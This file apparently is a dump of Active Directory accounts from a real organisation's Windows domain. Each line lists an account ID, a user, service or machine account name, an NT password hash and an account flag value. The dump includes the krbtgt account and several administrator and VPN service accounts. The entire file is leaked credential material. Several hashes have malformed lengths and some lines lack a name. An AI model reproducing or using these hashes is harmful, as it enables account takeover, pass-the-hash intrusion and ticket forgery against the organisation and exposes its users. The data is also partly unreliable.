9205 ASITC-WS0016$ a302e93852de55c7ba4c2840670215f0 4096
40165 elizabeths 362c54be8465845c2e2e1ee6ad3f89a7 512
1120 lindak 2bc2a0308594f2e7481db79c9904e160 514
1246 dawns a64795a7d05999a0c2b429586799325c 512
1207 shellyb a64795a7d05999a0c2b429586799325c 512
39702 ___VMware_Conv_SA___ 440e42204080d9d1808de1c706d6c165 66048
1215 ccwong 3eddbeb8fbbb24ad3145b1bb7efeee41 66050
1264 Factory1 36e12e09c91d45fdc66488df3d5b2baa 66050
1322 julianl 8277d4760aba9737afdef8deee04d800 66050
1257 leonc e3a0168bc21cfb88b95c954a5b18f57c 514
1310 Lilyh 175cb278577dab61c02b1b20f68075c2 66050
5143 shmalyr cab165b1381d8f2fb1284181a8d79a2d 514
2202 kennyc 0fe26ffc5107e4b20c5a1a1a90d6368c10 514
1242 SSL_Admin fe0cd4846440dbb281d30949283d32d 66048
5207 support_edi 47a01baef13f7dd7065e9418d962e128 66050
5229 MichelleG 3910589ae3080bf99f0faf5aedf6bcd3 514
5237 LPadgett be8410683e173bc7eb4d4983016d4df5 514
5274 support_pj 525a8ecb2bd7de7b9f21cdb27901acf7 66048
1726 Andrewl 1d842980d5b71e8dc94627f47f17fd3e5 66050
8106 janec ceac614e57e88a8cf43196e05bcb6e70 514
5328 FairyY 568d109272f3aa9a1de5460a26e0b3d4 514
1153 elkwarehouse2 e37bf2e00afb4d3cac811f26f52d9ca7 514
5135 Rickc 7535e15737dc6a6f9dbbdae6164687c1 514
1697 gloriak 1b7f0e3eb4a557a2acbb426852337c42 514
1266 stevenj f199f4354f200b30497f70aa76e86a2c 514
9138 sh_admin 433f858db8d9cad2334051f378c37ddf 512
5245 ITCMATEST e39f2af4d496348f1ed435ca236fc1cc 514
2150 michaelb a56c8954f922afb90fa3b92e7525fb19 66050
2209 kellib b48f1b5491446d29af4ac03a7425cd1c 514
1117 brianp 1304285dadeee9310ec81148b05bb5dd 514
5137 annetteh 87588e1455da040d8b49953d79921b4a 514
2134 bu_veeam b27c2ff6c11408721a28f0a4f6f16a83 66048
41105 aadsync 0cb6232407ea46c3d3f704cba48c5f56 66048
39660 PassportalSync 978f9dd19c43883714f73acd99500cb0 66080
5241 passwordnotify$ 182e24b2711b192713ef950fc1c0ed7f 4096
6607 egltech f5c2d037fbddf81469809c06802c4acf 66048
8156 SLETest 35a2a46fa8d8b8578d7502ae53c42272 512
2198 ITCMA-LT1029$ e78b195fdad2c2910c952221ce5da765 4096
1684 kenw 337fc9e65995c5c4fbfea451346b1df6 512
5670 ITCMA-LT1063$ 7b87606f1a9f613a0d830ea2ef0c82a3 4096
5343 warehouse3 16687489c6824897f2585c58fb345ad2 66050
40166 josephr f4bd4fda1036ee1fad27d0d9ef61ce1a 512
1614 superlogin 29812263b384df487b49ca82f3b4be48 66048
40144 advpn 08b0ec954a94d3c7f1824957bf3fde72 66048
5112 ITCMA-WS1053$ 4b8169fdf3158798a4fcb70e1efd78025 4096
1130 garyl 9101d0697357be9c6b98b784f9ccf979 512
5283 ITCMA-LT1040$ 11826271c727134f1092458c333df6e9 4096
1640 LynnV dc4468f73da3ad8810c65829e76ff826 512
40172 nicoles 32e238f08016761a5be98cd1ffd40070 512
1116 denniss 6681a0025a1066ee85ffee6a9f53a2fd 66050
40173 andrewr e116c5d8e0df37e1bc56100fdc069014 512
40197 jamies 1c49c9cc354ee8c1cef58c9193be2344 512
5658 tonyk 80eb29c49eebac198658d488970fcd8e 512
9193 ASITC-WS0009$ ee58fb1dcdefc20f1f81868c21522f87 4096
9150 ASITC-WS0063$ b2dd61db2862f89990834fc039e32f95 4096
8201 alicew 74793827f352c557c04a4da6a607adb4 512
2155 hky 81a4511c75e09afaf04bb0e28a7ddce2 512
39675 lorencec 91578f59a0caeaaabb0b5a2370ded6b1 512
8199 ITCMA-LT1028$ 81fb2eb37a0f2e911c7b0313d3ca73ae 4096
40170 adrianar 878691045748baa727bea9882c13eafe 512
9152 ASITC-WS0039$ 9f0043969a59b02b23f7847cebc6a628 4096
40200 hannahc c90c4669684f518d36771155d56f3ea2 512
5665 ITCMA-LT1057$ 2e4fb682d249cf53e7049a299aabce5a 4096
39611 egladmin d64655136d7f93780715bb1a83f7b40b 66048
40164 leonr dc85c733b853158f3dc3346f19fa78f9 512
1251 UPSAdmin d54feab3ae1cd743c74bd79e9c63aa36 514
5276 ITCMA-WS1076$ 044197422e06f63efe35a9ac8c249290 4096
39676 ssoadmin 3e4ec6517ffcc07a51059ebe8b9a05f4 512
9187 ASITC-WS0055$ 5745fa49aaa4a565eab048edb15910d8 4096
40156 angelaf 768139be80286a507b64b80eba0d4dd5 514
40154 davidh e62830daed8dbea4acd0b99d682946bb 512
40168 daniels d5993216e22e22e06efaf21d076b8c3f8e3 512
2164 jamesm ba4e5946331fc545914ecc9cbc8a3b53 512
39662 paustin 32ba59e63c228fc531b6e14a370d72ba 512
502 krbtgt 81e28a7bf06c3bff02feee793bcab78a 514
1151 warehouse1 67e4c62179d56d0f922105ee5681282c 514
1340 ITCMA-LT1020$ bd9a72e6b1d7e261d75b1cc6e26d4791 4096
40123 ITCMA-LT1075$ b82a59b0c5dc2046905ed60aa6ed25d9 4096
39668 ITCMA-LT1027$ a2dd537e33316e38637bc3e59df222b4 4096
41117 WINDEV2004EVAL$ c0334b629816e40e72731aabfbb0a973 4096
1694 angiel 33a26f76c61382ae500caccbca82803f 514
40135 kristiev 2f3efe73d291da6e7ddc9b54c238c308 514
41116 chrishoyt 25f900466b55ec728305c13027d24022 512
41115 terrin f9ee54b70f789caa6dd292c307a6250e 512
9219 ASITC-WS0113$ ac138f958fd09c5d7c28923be16b4f14 4096
5291 ITCMA-LT1041$ 7a67bdc20dce79ff44ce97d9fdc30c1d 4096
1231 SPFarm cc9bf398b6e637a2e7f708ea458c2105 66050
9226 ASITC-WS0128$ 3db5793500addec855f3787e33922c6d 4096
1313 sslvpn 0530e010fd31ed782ec4fc0d79231c5a 66050
39613 AAD_4e4f0fe8f058 08b0ec954a94d3c7f1824957bf3fde72 66048
41104 AAD_ee11aef66e2f 29311b26b9f3ef13e822d3263e4fa38f 66048
1138 dank 1a487688d1beba344274d40af2b7707a 512
5314 ITCMA-WS1090$ 074587b98978eb67005a7041f2851c38 4096
9223 ASITC-WS0108$ efc5c2fa304ecddacd8f4cf78c331290 4096
41108 testing 3e85d5a1410e277a4e7084c253810157 512
1337 deang 73d9e66b9131e12f52c441e208deaca0 66048
40206 micks ac2ac419036fd91e05aac746c8660a55 512
6608 vmware 3b224b954ae6a5bfca10a1c8688bfbbb 66048
8144 ITCMA-LT1060$ 660048976bb4b1cb09c26d89bbd1de2d 4096
8113 ITCMA-WS1098$ da533071e958348308f4e8ed581ec335e 4096
8168 Misc01 f2d429b35f633b12eefbee498aafbad2 512
2189 ITCMA-LT1026$ 92ff8ee0302d42f44d6f29de25760b45 4096
39629 ITCMA-LOANER1$ d7615b90d36bb108ead3e08ff636cc9c 4096
5174 SLEAdmin b28bc7ab76873471029a9ad657f75d18 66048
8185 Survey 7c5282ddad27303ae14390a5dde567f9 512
5293 ITCMA-LT1043$ 01363845f89c79d100b3ce008d9ddbe7 4128
8153 JessieC d92029926067bd7fed56b72ffda8e62a 512
5192 ITCMA-WS1027$ 4f4f2bf597a258f7e68d53ed59f2ca4c 4096
1240 PaceJet 06af9d10811d1951f7afd09efbebf6c6 66048
5633 MataC edbeb07a3c05e55b8721ac23f294bcb2 512
5669 ITCMA-LT1062$ bd08015476bc185b984785efbff43bf7 4096
39630 michellew cef2eb521883d390b32b0b5bb916f7bb 512
1127 lorin 7c8566e384468b76fe9c11f5ef635422 512
40120 timothym cef2eb521883d390b32b0b5bb916f7bb 512
39628 ITCMA-LT1073$ 04fba433f154bc3b66b780f110a64bac 4096
5216 ITCMA-WS1062$ e622588e1a0b5bfcac19cb13cc0296b1 4096
1689 rachelp 9a4c3fbbf6e6b1fe805d0ffc7378f0d9 512
9144 ASITC-WS0084$ 4b897158c8ef783510626ee501d67a23 4096
5648 warehouse2 1628488e442316500a176701e0ac3c54 512
40204 ITCMA-CR01$ c683d967ce29df38afbd1eff4f69e9f2 4096
5338 EricG 98884d9fd2e6def74cbb7bb34bdd650f 512
9211 70586bc2191f0a0872798bcb30c7fcdf 66048
9217 ASITC-WS0101$ 6dc65547a71877b96f32eb43fbf8eacb 4096
40133 hudreceiving 1d32ad40cecbc0419f99a08e0845dd66 512
1715 bdf0593666f4484c2860800af6834eb2 512
9199 ASITC-WS0010$ 343a3b47f144eb6784cf1f86893ad207 4096
9121 ASITC-WS0036$ aed48f171fd46be32ae4a4269032653a 4096
2141 linconf 4c3879fef394fa5dce0037c197c70841 512
1698 ITCMA-ENG01$ df61c05ce9fd0f68a79a6006bb7b0f26 4096
1716 flexlight 984cb3817e444c7e325ad0c4a471a74f 512
5683 ITCMA-LT1068$ 7a94bf2ca843c714bb1e69b840fafb80 4096
1665 ELKUPSUser dc4b02eb894f18b53d78197c8ffe024c 512
5308 RichW 8195790b740761023b7e34280db878c5 512
1219 tomh 78dfc14107c931f730bce53b47dee641 512
5627 ITCMA-WS1080$ 708ad4a3223993991427f33b6aea5da4578 4096
1277 trentr 589b85762d8ab451401df29aa7fdc417 512
1122 dickc 602a9783f3aa3422f2697b1115da27f3 512
2188 BradB dba247aa9535f1d877062d139d04a46a 512
8195 ITCMA-LT1070$ 02fd6908bd6d78b6b35b399d3e74517f 4096
5348 itcma-ws1094$ 03ab2b6c8260c6c5a89bb1dae3f2ae9f 4096
39621 ITCMA-LT1045A$ 652249fc223d285ba5b1df3251c192dd 4096
5324 ScottW 0d242248fffaa41f252e6208536793e9 512
8119 JonR 6c71c63361f9dc21a430202ab51778ec 512
8188 grantc 5bbe84fdc0909a8bf546a43a0e8f51f8 512
5691 ITCMA-FILE01$ 0432a09dab08a33ae21a840e783b5b5e 4096
4610 ITCMA-LT1024$ eae3eede976d2eb45dd3f3fa53df50f1 4096
6617 ITCMA-LT1090$ 9c2d2a7e1bf5a2400e3b9fbf6fb9f773 4096
8137 TroyR 74ff53312573ba0b4c14a02e699bc783 512
5315 ITCMA-WS1085$ 880db01931a6af925d9e16be8df4152b 4096
9151 ASITC-WS0052$ b6d0bdf0d33dd8ff2a4bfb6eff0f232a 4096
39661 jacobc 94629c257cf1c3484f7ce4b958d58465 512
9156 ASITC-WS0085$ 50db7ddeb7f9330fb46080c77e3e57f0 4096
40112 7dfe93aa1c69e0babe9f47d13f1244e1 512
9165 ASITC-WS0053$ 4db8640f43556b8bdaf26aada8701513 4096
9153 ASITC-WS0057$ 0258d1a53e8dbdec225c8dd4968d604e 4096
8138 AdamY f91c84f965aeaa6fa40061c2abf6015a 512
9213 ASITC-WS0092$ 77c16a86697dd4b86e34338d732240df 4096
9135 ASITC-WS0079$ 074ed936013417af38e68eac259455aaa 4096
9169 ASITC-WS0087$ 71c821d37d1ad6b1ad0c470819d55ecc 4096
6616 krist 589b85762d8ab451401df29aa7fdc417 512
40136 maxz ddf78b035828826e543a46b39136e719 512
40140 sonicwall_sslvpn 68d8b93b306e84fbc9cafbdc4862e2e45 66048
5345 CharlieS 8b614a4fa418d5dba77fe0507be8198f 512
9168 ASITC-WS0022$ 2cc6319c387e51328fec80047fda3980 4096
1290 rickyc 89999c3eb657280f275c08e2053ff9 512
9186 ASITC-WS0008$ d4ff1162d4facc94781f959a1fbb5941 4096
9164 ASITC-WS0062$ f4fdab0da2b779bdd983bc2d46611985 4096
9202 ASITC-WS0083$ 0643a9a9a37b5e27d2cd214b646f6b66e6 4096
9200 ASITC-WS0017$ 57087e094812b9580cd506a0c4b26393 4096
9157 ASITC-WS0065$ 28df06b223c9d6d67127a5eff355f250 4096
9183 ASITC-WS0076$ 4419874956a21e8bc8b94415a69caa1d 4096
5116 nickn 5ad8dfa79777ae85e3a9198994afc79b 512
9180 ASITC-WS0003$ b1a85968fc759735ff51fcbdfbacdf75 4096
1723 Vincenth 77821fad0a661be0ba6605ad032bc674 512
1227 9d9f65e7770f2eb4a9a9922785a37026 66048
39641 jendyl ac73e3569312c470c1173050f9763713 512
5141 ellisq ef5a55e8e2c597fb2274a0db179de291 512
9143 ASITC-WS0012$ c2aa049aca815fa017ceb9b35ac573eb 4096
2200 ITCMA-RDS01$ c2b76ea483a7b734fe9b809c505454b1 4096
5651 MartinZ 1d0c3a53e095f1de8aeac193fc50a1fc 512
9158 ASITC-WS0066$ b5790d71ccb65d5f0a173dfa6af9f5e7 4096
9163 ASITC-WS0058$ 785c911425e4dba6650253bd2e6adfa4 4096
5307 SpringL 4c3879fef394fa5dce0037c197c70841 512
9149 ASITC-WS0042$ a2e739b1a844c342cd53b990e30349eb 4096
9182 ASITC-WS0060$ 374be92c8d690faf9152ecabcee56bb8 4096
5337 LilyY a3d7d25665f1146b56192b850fd57a93 512
1722 Kennetht ac73e3569312c470c1173050f9763713 512
9172 ASITC-WS0005$ 9e57afffcbef2ff80156c6f45eea94d8 4096
9215 ASITC-WS0100$ a0dd5d2ac2fd77398d34022ad30af4cd 4096
9185 ASITC-WS0015$ d004d9a9552304e9c3e17401a8d1b741 4096
9145 ASITC-WS0011$ cbabe431f02624d2aeef9f20dccff406 4096
5355 jennyh 0c6ee318d17ec8350c0e4072c7598688 512
9117 ASITC-WS0047$ 2178a6041d81a4db6e93ebdb60bdad93 4096
9195 ASITC-WS0018$ 4b15087c8ba463248e601e8d3bc12d58 4096
9128 ASITC-WS0041$ bae8e6cca6cca90b76a169c8e30ded1c 4096
1109 jenniferl a13fe7d09755075eac80a205bb64fe5c 512
8196 jerryh 3f05f368eb0a6355e7071fb1bd1772f1 512
1108 johnp 76cf8d1787696fa522b1b41876d1bf11 512
9171 ASITC-WS0002$ 526eb819e509b9d36f19884cd292f0eb 4096
1112 rockyx a243ea0a666107e5946362230e328cf3 512
9218 ASITC-WS0103$ f361e82f7477397813e7518335030dbe 4096
5685 warehouse4 a243ea0a666107e594646362230e328cf3 512
8146 LilyW ac73e3569312c470c1173050f9763713 512
9192 ASITC-WS0091$ 8057ddd7385e20cf72b03467b71b1055 4096
40125 angelad cef2eb521883d390b32b0b5bb916f7bb 512
9224 ASITC-WS0124$ e601c71b66cfbd841c2205369019bd12 4096
9222 ASITC-WS0107$ 65e14c85412376d5466beabd34bef078 4096
5675 TomX 91e049ff1cde360a572baa9e56ad06fd 512
1114 leoc 150180de61e3227350ff3d5071491db8 512
9122 ASITC-WS0038$ e1ae58f2ddce651ba004a6e50e58b365 4096
9154 ASITC-WS0019$ 17d89c904db18d8891450f73e9c1102e 4096
9133 ASITC-WS0028$ bdc3f3e7df71268bd68f2e7a0ca210d5 4096
9196 ASITC-WS0074$ d948dbd6bc6ecd5fb22b8b9a01c7f02b 4096
9179 ASITC-WS0007$ b74c2aacf8a4c93d4f4e0ea8e3b5ec7c 4096
5342 nk_admin 27d2802e45ca182a36a973e1196d3140 512
5674 ITCMA-WS1103$ 79dae924620dc3597721c8fb781b0418 4096
1721 Georged 589b85762d8ab451401df29aa7fdc417 512
41106 MSOL_ee11aef66e2f 6c03524467d457057285375c927dc454 66048
5656 winniez 768b312e7c14f5ee736e9d4034e0f305 512
9173 ASITC-WS0082$ c50ff420363cc0c2c3754d1a8cea8816 4096
9134 ASITC-WS0029$ 61e3b015e1181c6dd1e9d63c617e4e11 4096
2214 ITCMA-WS1069$ 5d46cf0d0441efc1f5f87e01c6fefc 4096
6605 JasonC 3dbc75a400cd00a0bc8cf4e0c224942b 512
41113 ITCMA-LT1089$ 8882bc0e7054dea98c44e3ee950ef70e 4096
8128 MaxW 2e15903e952c12546b70e040e2c0108f 512
40124 valeriet 1d06532226cfd222dfe7d3345a624002 512
1121 sueb cef2eb521883d390b32b0b5bb916f7bb 512
1712 kathyor b5fb31b1e2fb8c139e6bcac28bcd7441 512
39646 johnnyp 045d0f10ff8f7211af43cd83cd57dfbb1 512
40181 ITCMA-PDM02$ fee7c0bec5318d556fcd6d24a24d2409 4096
39687 ITCMA-PDM01$ 48f7baea11ec5f7a38ddbc5fc0846999 4096
39696 ITCMA-LT1084$ 4f441d3427ebda9bf1fd27bc28c21d56 4096
9170 ASITC-WS0006$ 49e58bf3899318799d2eda67e1fc454c 4096
9221 ASITC-WS0117$ 58dc929f38be59ba560603bef738da95 4096
9116 ASITC-WS0048$ 2b9b4cc96125ddfd7a21f82eb0d75281 4096
1226 ITC-SHIP01$ 02e9d34a1fc453dfde9912a0e71f48df 4096
39640 mits 5c31c260d6ffad231aa02fb4dd4fba5c 66048
5625 ITCMA-LT1036$ eb8b49dc77472c0c525444cb926ce22f 4096
8166 br_admin 555601b2d489ec2bfb7d189544736c8b 512
5673 ITCMA-WS1102$ f4cba060887dba209fd64aeef486c7a9 4096
8167 ITCMA-LT1067$ 858962301f26159a8fda2486219079a6 4096
8152 ToddD f2a808efade793dd9d6c5c5e0f5a3fdc 512
9174 ASITC-WS0077$ 14eca4102e70e7893ab9172241b26771 4096
40190 ASITC-WS0102$ ff3a54a4f043a3ae507a89f12d9c3baf 4096
8154 PeanutW 785e7255bf1d30e599ee84d67a732a3a 512
39669 clarkq 496d433763519e769c9e959d0924814f 512
9214 ASITC-WS0099$ f4eb1fb33d94882c1971b6e44f180e2b 4096
9115 ASITC-WS0050$ 21b24694208f2fad3efbbe88a0fc4264 4096
9140 ASITC-WS0025$ 084e4246aaf6f222d11ea232c9ca4e4a 4096
9132 ASITC-WS0027$ 631d50d60830b86b79cb04b5428b9e3a 4096
8122 arongQ 4874a28a2801c2867178c6c744bd982e83 512
40202 auto1 b51746b3157de258a4084869a9be10d6 512
1677 scotth 20b2ef7e67106f082391db8fe87ae03d 512
8136 soffit01 71554f0a11b6b0fcd545dabe2b6df955 512
8181 marieb 09774c752585c14081b2afa7422942b9 512
41604 ASITC-WS0135$ 2bba96e281a7a70c6e9b6486fc012110 4096
5661 YvanL 1e09a46bffe68a4cb738b0381af1dc96 512
5659 cindyl 1e09a46bffe68a4cb738b0381af1dc96 512
9147 ASITC-WS0004$ cb151889a847f2585920a641009d8b20 4096
40131 beel ac73e3569312c470c1173050f9763713 512
5346 FlorenceP d30b4866d451361d8f2ef374b873eeac 512
40207 tinag 589b85762d8ab451401df29aa7fdc417 512
5638 elkprod 7d6b2947a290a276376814e7a382e518 512
5136 ITCMA-WS1099$ c6ded49ecb1e547cb7f4247947968e8d 4096
41608 ASITC-WS0168$ 1dd47ec61c86ff0c314245519040568d 4096
41606 ASITC-WS0129$ c7e2b80355118c4116900d886fa8625a 4096
1123 mikec c675d9a7e3e2c28fa987d3ba0a0a83c5 512
2149 ITCMA-WS1052$ d053d2956e5c94d062b6979871c7f6db 4096
41607 ASITC-WS0139$ 4280ad0e0d239158263d251caa1f539d 4096
9113 ASITC-WS0045$ ee5a60769be509dd954b6bbebc1b96ad 4096
8180 egl_admin 08b0ec954a94d3c7f1824957bf3fde72 66048
5217 ITCMA-WS1063$ aed367e6acd55efca95bc451cd8d436a 4096
1315 kellig 05251d1bc8c5176e98d77404b43f11dd 512
2171 AITCWarehouse 589b85762d8ab451401df29aa7fdc417 512
8605 ASITC-FILE01$ db2d3d53d41734ab634cd39b439dea46 4096
1732 michaell 346f769ad1eec38fda1501b164ab401c 512
1668 LABUser 9b665ada5fe4dbfa9ff997bf50fba587 512
39670 annaz 9dd6d72708017033337d5dc64b0183b5 512
1646 ITC-SQL01$ 96c0ec400f7d4bb868c703070b630d73 4096
1124 rhondav 7dc8d897357047e77c496232457e6c29 512
8198 sydneyv 7d478a98cc76ac41dad5d0e295d1256e 512
2174 OpenDNS_Connector 5b2adf3cc355fa00012dec6642fbcb23 66048
5304 SuzanneP 7fbffce5d584353c32eebbffed8185a6 512
1278 ITC-PLM01$ 83bd68b61581913288aceb9207d00153 4096
9162 ASITC-WS0068$ 731b03852edd2b45a7b02dec39495698 4096
9178 ASITC-WS0088$ 8d2d8d8d6525886b6269a4a15b8771c7c4 4096
9114 ASITC-WS0049$ 4002bbd6b1f12639a53928babd87397b 4096
1291 mermaidm 4aa448e40457ecfffabc454d5d814c95 512
9159 ASITC-WS0064$ eccafcb76beba90f9d281b6f29b8ae77 4096
5253 MarkS 4c3879fef394fa5dce0037c197c70841 512
41110 ITCMA-LT1088$ e6643c134cdbf7ed2842d36d9c123ee3 4096
1308 Sophias a20c55fc8a97620cb7da82cdd8a2123c 512
1321 tonyz 6439b5c22963a7d3fdcdbef2e14ea64a 512
9120 ASITC-WS0033$ 9cd945dca0ba209fc0420a249468e746 4096
9203 ASITC-WS0035$ 528aa4c85745626b54e882c86df6f852 4096
9155 ASITC-WS0067$ ab87aa7e043bfe66f6dd4f3a7668d336 4096
9209 ASITC-WS0094$ 03d46c1589497bdc00197af7a585bf6c 4096
9141 ASITC-WS0078$ e87df5023472150321e8d94f0ad63042 4096
9130 ASITC-WS0081$ 48de5b4ea9e4a711b9016974260496fa 4096
9197 ASITC-WS0037$ 2c71afbc106dcdb8c022a7409596dcb3 4096
8159 JasonCh d3f705cd89b4db9b8a53ea79cb257a8a 512
5664 ITCMA-LT1055$ 267a1360303abd9f695fc64cde07bbba 4096
1241 !SSL_ServiceTsk 3609c62b8990d85ab713ae6ed77cebcf 66048
40177 jettl c227421e8189a063150b39c603117530 512
2191 ITCMA-WS1058$ cef74a97bec5eadbb408b249945e1e65 4096
39622 ITCMA-LT1072$ 97228631d61bb16f6cf13544a55efc10 4096
5223 ITCMA-WS1071$ 1fbfa869ed00234c349abb280cc83698 4096
5252 JuanC 687f1627e4133d362f03d6ac6ea53892 512
1667 CARTUser 1028fc03c240cc8ed70ef354339a697e 512
1664 UPSUser2 af35b144ffee4878102b3c9f7773468b 512
2180 ScottM 414a88ab17458ae38689100c7c974642 512
39643 ITCMA-LT1077$ c988f7c681ac0211e847c1d303b205f3 4096
39639 willm a19256a8c37fcc358b4fac9a6e237653 512
5312 ITCMA-LT1048$ 1513a6fc88d006311487115cb1934c39 4128
40147 elkreceiving2 49e4d01ff1faa8e66131e8b362d075f2 512
9106 bkupsvc 7b692769ffe8f2c80bb8e798aab2ac48 66048
5227 ITCMA-LT1031$ 89666bff1c661f261c3ecdeebd1bd38b 4096
5191 ITCMA-WS1026$ 497bc36751be11660d072a284c2d83c0 4096
5150 brads 48422d9ccd934cfb5fcebbca5856b31c 512
1676 garya 12296e0eadce1f32677002ffe3eb1778 512
1675 Melissas 61b9d9d533e8da9787c1627f99bddac7 512
5138 marilouc 42cd437089c9e91e34b98e6b6aa71663 512
5130 todds 34f348628cd5172b706c4c163f83cfa6 512
40198 tessr 921b9f2cb24f8b52b4c89d3a2de3cebd 512
2212 ITCMA-WS1067$ 387ebcc0fdc7309aeeae09670c00c2cf 4096
5684 ITCMA-LT1069$ c26ac2fd55e96cf0b8480f5c92c66526 4096
40189 ITCMA-LT1085$ c4ec35eb1c9edfa3483e4febf769a070 4096
40185 jimb 56f7cf5782cdcf19a42f83036b4e5b05 512
5672 ITCMA-LT1065$ f2de5fb7c429f931297045d9e52b44d9 4096
2162 teds 59a871f3c39563e85f2d07302518e951 512
8148 AndrewF 8f46bf799df8b659cd8bc5fc0bcb35e4 512
5204 rebeccan 51fa7c7a2a313ff469ec7cb18dedc78d 512
41107 ryans 4752c1db828ba42e9628c32670caa28c 512
5650 itcma-ws1093$ 03b59aac9e774188c8ddb8d58e9c7128 4096
5295 ITCMA-LT1042$ e856e89c5f9ebd71836490cb33394ee4 4096
5645 ITCMA-LT1050$ 9f6f53647ac22534ea43a801a2eb40c3 4096
39692 ITCMA-LT1082$ 4c3197b8b85c3d6814e97f58eb233cb7 4096
39690 ITCMA-LT1081$ a89faaa8ee2bcd2443302d0006db4722 4096
1119 chrisf d9227d4a4e8a9cb2014efd590f77537c 512
8165 benr 3de6554c573264dbff829c49e5b1c3ab 512
8142 ITCMA-LT1059$ ca7966e9f54b6409a1b112dc179d5463 4096
41111 ITCMA-LT1039$ 6c4aed3d1097167d27f836b37c009f59 4096
5290 mikea f74af2c3225468e8e55138ae7f3f756b 512
5215 scantofile 746b183cfa4a8f712aa6ddf24e35ade0 66048
5666 ITCMA-LT1058$ 55e4a0a3413aae1578ec870067332c0e 4096
1338 toms b6c8dfb9384e1aff6b0c96ccf5d3d372 512
8173 ITCMA-APP02$ 4151587ab998907f94b31263d862b52c 4096
5339 ITCMA-FILE03$ 4db2224454be54de4890997f7642413a 532480
9175 ASITC-WS0089$ 23f0a7ae78467993f66d3c9390f53aa 4096
1666 ELKUPSUser2 dc4b02eb894f18b53d78197c8ffe024c 512
1714 hmi d9c5f9142b2ebb0db74a4bf1be1f5a92 512
8174 ITCMA-SQL02$ a242663b6b7919475b979455d02b6ef9 4096
40179 damyw 3f5b3dba0b2001c5dce2206657de659d 512
8129 PerryB 82775d998ec703e7641b1b6a9f754afc 512
1148 shipping d1fd53f75570fdcd068131bfe9bba98c 512
39699 ADMIN-WIN10$ 74c4be79cbd55618f3d03d61d3e6e155 4096
5222 ITCMA-WS1068$ ae91c6879c8b788f20d321293ca0687d 4096
1253 UPSUser af35b144ffee4878102b3c9f7773468b 512
40205 ITCMA-LT1075A$ 37dd9d6b0946ad54fd0363b0423961df 4096
5233 MichealL 305367a78b9da467f8a51bcebeba14f3 512
39605 DESKTOP-2K97RKS$ a4dcf170edb8f1bb5d74b87fde6e7a5f 4096
8131 ITCMA-LT1056$ a3a15993129dee61e4ed21218ec11e0b 4096
41114 shelbyf 73cc477f6f9f435b260d82064832a452 512
1142 rebeccav 366f6b114b44d6e45517809707c36be1 512
5173 dirrickf 0ecbe5adf5d974ddaa39619a13cd7ab4 512
5220 ITCMA-WS1066$ 40a077add23aa2ebdb5818bd031bf307 4096
5231 ITCMA-LT1033$ 74855c5256c06c1ee98279a08c8d1763 4096
5286 ITCMA-LT1037$ e86ab9c34a6b34c3a62818cfe0e12691 4096
8604 ASITC-APP01$ d0881c6838886a9e66ff379789e63833f 4096
9146 ASITC-WS0080$ 9ec15af2f32331f7487b26562cc42705 4096
1110 kittyl b996e84bb89f6220f5c3807565b6b7d0 512
2154 dannyz e7b74e7fab85bf87e19970c2bd85ea49 512
5148 lenay acbfc03df96e93cf7294a01a6abbda33 512
5325 MinaL 1e09a46bffe68a4cb738b0381af1dc96 512
2208 kayl 6e4b9a5b9d3b7848e7335a0b8fdfc80d 512
40134 samh 4c3879fef394fa5dce0037c197c70841 512
9177 ASITC-WS0090$ 62b7dba943140ed72486e7563a2cd8b9 4096
9105 ITCMA-ENG04$ 308e6f0d0c31d0028c5e0c6fd7408b4b 4096
5146 tommyl 589b85762d8ab451401df29aa7fdc417 512
9194 ASITC-WS0026$ 86a0ab4dc8c7525214fc0da20626bc65 4096
5626 ITCMA-WS1079$ 50441517b15a4c83e9609d858809dd47 4096
39638 infor_edi 1941c372c3c802defa0af03fddf10c04 66048
1309 Davids 8ee8bf3b64f0064eb92f217c772537ca 512
8140 FrankM a0c046c39e44cf25dd13b64a0ad76ba2 512
39650 yvonnew ac73e3569312c470c1173050f9763713 512
40186 its-macbook-pro$ c629fa10ebdf80214797d0e23faa41b3 4096
5635 ITCMA-WS1083$ 3404ebdbb4e84243145f7774264f71b7 4096
40148 briang 1d32ad40cecbc0419f99a08e0845dd66 512
40184 jamesong 5edca7360010cbc2ab0fead3aabe956f 512
40209 angelar 16a1285d0f4e4a0cf054c6352a0c095d 512
40208 sergiog 00c1f9555484a4e195f8b94505ccdbd5 512
40210 amberg 59fdc659b9880d993a329bc756a42256 512
41120 shenandoahv 87dcfbfbfeea7f85a43957e0850834ab 512
39648 devb 4bf03c4aa37d8389cacc45e526aa0b38 512
40211 michald 6ccc06be81b8b09d60079974ba9db2bb 512
8169 ITCMA-WS1104$ 5953e40b3938b0fb62208022d39eb9e9 4096
9125 ASITC-WS0043$ 87ec000a514789bec89fd918899fcfd6 4096
1218 laurac bfaac897b28785368be4da98b9a0d0a6 512
1136 miket b62f3243655382a981101440602b41f1 512
6615 eagle 7b692769ffe8f2c80bb8e798aab2ac48 66048
9181 ASITC-WS0056$ 1aa89d969639fccdfb04791007978d53 4096
40118 ITCMA-LT1071$ 541bcadfd13d7e3ade7a096a93d7dd2a 4096
41109 makennav a994e5abc8147600c5d0583d7b6eb3ec 512
8111 ITCMA-WS1096$ 5808f63ae3602b42bdfa6850c16946b1 4128
41121 kevink ac6cd6418d4c26a045130e375a3c506b 512
1725 Kevinz 3dc28ff71f35d8e9710efc8b4cf806de 512
5636 ITCMA-LT1046$ 557e5ffbee69f8230c459e0152360bd9 4096
1225 ITC-APP01$ c540266f62332be049066bb283de2ad0 4096
2213 ITCMA-WS1070$ 9801015586f63e13b511204bbc41414d 4096
9160 ASITC-WS0070$ 7d75195cf0e25398cdfe6cf6ba42de89 4096
8164 RubyZ a882591c875ae54533fc6f14fa6173ce 512
40137 tobyz 199b266b3092ea1efee1d81a017c481b 512
1282 sherryl afc5283b49e82c8ac72f89b82be0f758 512
2186 jackyh 0672f1fd9d5ab94d376cc2a43ef892fc 512
9184 ASITC-WS0014$ 0999c110034768046023751e6ba1ce78 4096
40132 nicoc 589b85762d8ab451401df29aa7fdc417 512
5211 billl f37ab74d11ba8d794987fab03a58403c 512
1325 NancyZ 132c1e433f064060a370c0e9c4d28eb6 512
5335 DarayC 4cae4b4e9d177b0bf725b62226abf740 512
8149 JackZ 06a750a192abd9537ed8686d08b02f49 512
41605 ASITC-WS0136$ 1cbf5953a90d46ce8f8de3d82c2135db 4096
40145 ITMCA-LT1080$ e67e8dc0b3b37509aa60815ba37da4d7 4096
9131 ASITC-WS0072$ 53167030a37271d9246a7aa7327d7f68 4096
5688 ASITC-DC01$ beb8bb0fdd50b87ba48bd979b54736b8 532480
1636 davidr 247f65d89f9ab9e6f85da87fef9c84eba 512
